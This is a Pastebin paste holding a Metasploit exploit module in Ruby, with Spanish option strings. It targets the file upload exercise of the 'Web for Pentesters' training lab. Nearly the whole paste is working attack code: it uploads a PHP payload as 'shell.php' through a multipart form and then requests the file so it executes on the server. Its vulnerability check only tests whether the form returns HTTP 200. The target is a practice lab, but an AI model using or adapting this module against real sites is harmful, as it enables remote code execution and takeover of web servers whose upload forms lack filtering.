Advertisement
miguelangelgarcia

Exploit MSF para FileUpload

Jul 26th, 2014
615
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. require 'msf/core'
  2.  
  3. class Metasploit3 < Msf::Exploit::Remote
  4.     Rank = ExcellentRanking
  5.    
  6.     include Msf::Exploit::Remote::HttpClient
  7.    
  8.     def initialize(info={})
  9.         super( update_info( info, {
  10.             'Name'          => 'File Upload en Web for pentesters',
  11.             'Description'   => 'Ejemplo de File Upload',
  12.             'License'       => MSF_LICENSE,
  13.             'Author'        => [ 'nodoraiz', 'Miguel Angel Garcia' ],
  14.             'Platform'      => ['php'],
  15.                     'Arch'          => ARCH_PHP,
  16.                     'Targets'       => [['Automatic',{}]],
  17.                     'DefaultTarget' => 0
  18.         }))
  19.      
  20.         register_options([
  21.             OptString.new("path", [ true, "Ruta al formulario de subida", "/upload/example1.php" ]),
  22.             OptString.new("file", [ true, "Nombre del fichero a crear", "shell.php" ]),
  23.         ], self.class)
  24.    
  25.     end
  26.    
  27.    
  28.     def check()
  29.    
  30.         init = send_request_cgi({
  31.           'method' => 'GET',
  32.           'uri' => normalize_uri(target_uri.path, datastore["path"])
  33.         })
  34.        
  35.         if !init or init.code != 200
  36.             return Exploit::CheckCode::Safe
  37.         else
  38.             return Exploit::CheckCode::Vulnerable
  39.         end
  40.        
  41.     end
  42.    
  43.    
  44.     def upload()
  45.                
  46.         data = Rex::MIME::Message.new
  47.         data.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"image\"; filename=\"#{datastore["file"]}\"")
  48.         data.add_part('Send file', nil, nil, 'form-data; name="send"')     
  49.                  
  50.         upl = send_request_cgi({
  51.           'uri'    => normalize_uri(target_uri.path , datastore["path"]),
  52.           'method' => "POST",
  53.           'ctype'  => "multipart/form-data; boundary=#{data.bound}",
  54.           'data'   => data.to_s
  55.         })
  56.      
  57.         upl
  58.        
  59.     end
  60.    
  61.     def exploit()
  62.    
  63.         upl = upload()
  64.         if !upl or upl.code != 200
  65.             fail_with("Fallo en la subida del fichero")
  66.         else
  67.             send_request_raw({'uri' => "/upload/images/#{datastore["file"]}"})
  68.         end
  69.     end
  70.  
  71. end
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement